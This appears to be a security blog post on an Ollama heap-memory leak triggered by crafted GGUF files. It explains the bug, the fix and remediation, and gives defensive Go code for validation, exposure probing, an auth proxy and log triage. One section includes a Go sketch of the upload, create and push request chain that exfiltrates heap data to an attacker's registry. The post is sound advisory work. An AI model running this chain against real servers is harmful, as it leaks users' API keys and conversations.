# Ollama CVE-2026-7482: crafted GGUF leaks heap memory from exposed API servers
## TL;DR

- **Affected:** Ollama before 0.17.1, on network-exposed instances where /api/create and /api/push are reachable without authentication.
- **Action:** Update to Ollama 0.17.1 or later. Audit pinned Docker tags, stale VM images, and forgotten dev servers.
- **Check:** Exposure of 11434/tcp, OLLAMA_HOST=0.0.0.0 in configs, reverse-proxy auth, and env vars or API keys loaded into the Ollama process.
CVE-2026-7482 tests how far “local” actually extends when you run a local LLM.
Cyera Research’s disclosure shows that a crafted GGUF file fed to Ollama can exfiltrate heap memory from the Ollama process via the model-create and push workflow.
CVSS is 9.1. The fix shipped in 0.17.1.
## Ollama trusted GGUF size declarations
The bug lives in the GGUF loading and quantization path.
An attacker crafts a GGUF file whose tensor offsets or sizes exceed the actual file data.
When Ollama processes that file through /api/create, the quantization step reads past the end of the real buffer into adjacent heap memory.
The fix commit adds a file-size check in fs/ggml/gguf.go that verifies each tensor’s end offset against the actual file size.
server/quantization.go also gained a check that rejects tensor data shorter than what the shape metadata promises.
In short, the fix stops Ollama from blindly trusting declared values inside a GGUF.
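The invariant is easy to state in code. Here is a minimal Go sketch of the kind of check the fix adds; the struct, field names, and function are simplified stand-ins for illustration, not the actual code from fs/ggml/gguf.go:

```go
package main

import (
	"errors"
	"fmt"
)

// tensor is a simplified stand-in for a parsed GGUF tensor entry.
type tensor struct {
	Name   string
	Offset uint64 // declared start of tensor data within the data section
	Size   uint64 // byte size implied by the declared shape and dtype
}

// validateTensors enforces the invariant the fix adds: no tensor may
// claim bytes beyond the end of the actual file.
func validateTensors(tensors []tensor, dataStart, fileSize uint64) error {
	if dataStart > fileSize {
		return errors.New("data section starts past end of file")
	}
	avail := fileSize - dataStart
	for _, t := range tensors {
		// Comparisons ordered so the arithmetic cannot overflow uint64.
		if t.Offset > avail || t.Size > avail-t.Offset {
			return fmt.Errorf("tensor %q: declared extent exceeds file size %d",
				t.Name, fileSize)
		}
	}
	return nil
}

func main() {
	// A crafted file: the tensor declares 1 MiB, far more than the file holds.
	crafted := []tensor{{Name: "blk.0.attn_q.weight", Offset: 0, Size: 1 << 20}}
	fmt.Println(validateTensors(crafted, 4096, 8192))
}
```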
The attack chain is compact.
```mermaid
flowchart TD
  A["Attacker crafts<br/>malicious GGUF"] --> B["/api/blobs<br/>uploads file to Ollama"]
  B --> C["/api/create<br/>triggers model creation"]
  C --> D["Quantization reads<br/>past buffer into heap"]
  D --> E["Leaked memory<br/>embedded in model artifact"]
  E --> F["/api/push<br/>sends artifact to attacker registry"]
```
The leaked data does not sit in a crash dump waiting to be found.
It gets baked into the model output artifact and shipped out via Ollama’s own push endpoint.
Cyera notes that system prompts, user conversations, environment variables, API keys, and in-flight code or documents can all end up in the leaked region.
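In HTTP terms, the whole chain is three requests against a reachable instance. The endpoint paths below match Ollama's public API; the JSON bodies are illustrative, since field names have shifted across versions, and the target, digest, and file contents are placeholders:

```go
package main

import (
	"bytes"
	"fmt"
	"net/http"
)

const server = "http://victim:11434" // hypothetical exposed instance

func post(path, contentType string, payload []byte) {
	resp, err := http.Post(server+path, contentType, bytes.NewReader(payload))
	if err != nil {
		fmt.Println(path, "->", err)
		return
	}
	defer resp.Body.Close()
	fmt.Println(path, "->", resp.Status)
}

func main() {
	gguf := []byte("...")       // stand-in for a GGUF whose tensor sizes overstate the file
	digest := "sha256:<digest>" // SHA-256 of the uploaded bytes

	// 1. Stage the crafted file on the server.
	post("/api/blobs/"+digest, "application/octet-stream", gguf)

	// 2. Trigger creation with quantization; the overread happens server-side here.
	post("/api/create", "application/json",
		[]byte(`{"model":"exfil","files":{"exfil.gguf":"`+digest+`"},"quantize":"q4_K_M"}`))

	// 3. Ship the artifact, leaked heap included, to a registry the attacker controls.
	post("/api/push", "application/json", []byte(`{"model":"exfil"}`))
}
```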
## The vulnerability bites where localhost assumptions break
Running Ollama on your Mac with ollama run is fine as long as the attacker cannot reach the API.
The issue shows up when Ollama becomes a “slightly-exposed local inference API.”
runZero notes that while Ollama defaults to binding 127.0.0.1, OLLAMA_HOST=0.0.0.0 is widespread in production setups.
Cyera estimates around 300,000 internet-facing Ollama servers.
The exact number matters less than the pattern: Ollama has quietly shifted from “inference runtime on a personal machine” to “shared AI backend.”
On this blog, I wrote about exposing a local LLM as an external API via VPN.
That setup uses LM Studio behind Tailscale, never exposing the model server directly to the public internet.
This Ollama CVE shows exactly where that distinction becomes a defense boundary.
Once 11434/tcp is reachable from outside, the model server’s API carries the same attack surface as an unauthenticated admin panel.
Even in a local RAG stack with FastAPI, Chroma, Open WebUI, and Ollama on an M1 Max, “the UI has a login page” is not a sufficient boundary when Ollama sits behind Open WebUI or FastAPI.
If Ollama’s API is visible from the same LAN or Docker network, it can be reached through a different path.
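One way to verify that is to probe from a vantage point that should not have access, say another container on the same Docker network or a neighboring LAN host. A minimal Go sketch against the unauthenticated version endpoint, with the target address as a placeholder:

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"os"
	"time"
)

func main() {
	target := "http://192.168.1.50:11434" // hypothetical host to test
	if len(os.Args) > 1 {
		target = os.Args[1]
	}

	client := &http.Client{Timeout: 3 * time.Second}
	resp, err := client.Get(target + "/api/version") // unauthenticated by design
	if err != nil {
		fmt.Println("not reachable:", err)
		return
	}
	defer resp.Body.Close()

	body, _ := io.ReadAll(resp.Body)
	// Any answer here means the full API, including /api/create and /api/push,
	// is reachable from this network position.
	fmt.Printf("reachable (%d): %s\n", resp.StatusCode, body)
}
```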
## What to look for beyond chat history
The scope of a leak investigation goes beyond conversation logs.
You need to audit everything that shared the Ollama process's address space.
| Location | Why it matters |
|---|---|
| Environment variables | OpenAI, Anthropic, GitHub, or internal API keys loaded into the same process environment |
| System prompts | Internal RAG role configs, restriction rules, internal URLs |
| Conversation fragments | Other users’ inputs, pasted code, document summaries lingering on the heap |
| Model creation logs | Entry point for tracing malicious GGUF uploads and push activity |
If Ollama was behind Claude Code or an MCP bridge, tool call inputs and outputs are in scope too.
As covered in “using MCP servers with Ollama and local LLMs requires a bridge,” Ollama is the inference engine, not an MCP host, but the bridge side touches files, databases, and SaaS tokens.
If those results flowed back into Ollama as prompt content or tool responses, they may persist in heap memory.
This is not a case of “the AI leaked a secret through its output.”
The server process's memory boundary was breached before any model-level guardrail or prompt safety check could come into play.
## Fixing the read is not enough if the API is still open
Updating to 0.17.1+ closes this specific GGUF out-of-bounds read.
It does not make it safe to expose the Ollama API without authentication.
/api/create creates models.
/api/push sends artifacts to external registries.
An unauthenticated endpoint that accepts both from the network hands out significant capability, CVE or not.
Bind Ollama to 127.0.0.1 or a closed network.
If external access is needed, put Tailscale, WireGuard, mTLS, or an authenticated reverse proxy in front.
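Even a small token-checking proxy changes the picture when a full VPN feels like overkill. A minimal Go sketch, assuming Ollama stays bound to 127.0.0.1:11434 and a shared secret in a PROXY_TOKEN environment variable, both illustrative choices:

```go
package main

import (
	"crypto/subtle"
	"log"
	"net/http"
	"net/http/httputil"
	"net/url"
	"os"
)

func main() {
	// Ollama stays loopback-only; the proxy is the only network-facing surface.
	upstream, err := url.Parse("http://127.0.0.1:11434")
	if err != nil {
		log.Fatal(err)
	}
	proxy := httputil.NewSingleHostReverseProxy(upstream)

	token := os.Getenv("PROXY_TOKEN") // illustrative: a shared bearer token
	if token == "" {
		log.Fatal("set PROXY_TOKEN before starting the proxy")
	}

	handler := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		got := []byte(r.Header.Get("Authorization"))
		want := []byte("Bearer " + token)
		if subtle.ConstantTimeCompare(got, want) != 1 {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		proxy.ServeHTTP(w, r)
	})
	log.Fatal(http.ListenAndServe(":8443", handler))
}
```

A real deployment would add TLS and per-route policy on top; the point is simply that /api/create and /api/push stop being anonymous.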
Check Docker Compose and systemd configs for lingering OLLAMA_HOST=0.0.0.0.
If you are pulling Ollama Docker images by pinned tag, update the tag.
If the API was exposed for any period, rotate API keys that lived in the Ollama process environment.
Look for unusual sequences of /api/blobs, /api/create, /api/push in logs.
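Log formats differ between Ollama's own output and whatever reverse proxy sits in front, so treat this as a rough triage sketch rather than a ready-made query: it walks a log file, hypothetically named ollama-access.log, and flags the first occurrence of each stage in order:

```go
package main

import (
	"bufio"
	"fmt"
	"log"
	"os"
	"strings"
)

func main() {
	f, err := os.Open("ollama-access.log") // placeholder path; use your actual log
	if err != nil {
		log.Fatal(err)
	}
	defer f.Close()

	// The three stages of the chain, in the order an attacker needs them.
	markers := []string{"/api/blobs/", "/api/create", "/api/push"}
	stage := 0

	sc := bufio.NewScanner(f)
	for n := 1; sc.Scan(); n++ {
		if stage < len(markers) && strings.Contains(sc.Text(), markers[stage]) {
			fmt.Printf("line %d: first hit for %s\n", n, markers[stage])
			stage++
		}
	}
	if stage == len(markers) {
		fmt.Println("blobs -> create -> push sequence present; investigate further")
	}
}
```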
Check outbound traffic to model registries.
If you run an asset discovery tool like runZero, sweep for the Ollama product name and 11434/tcp.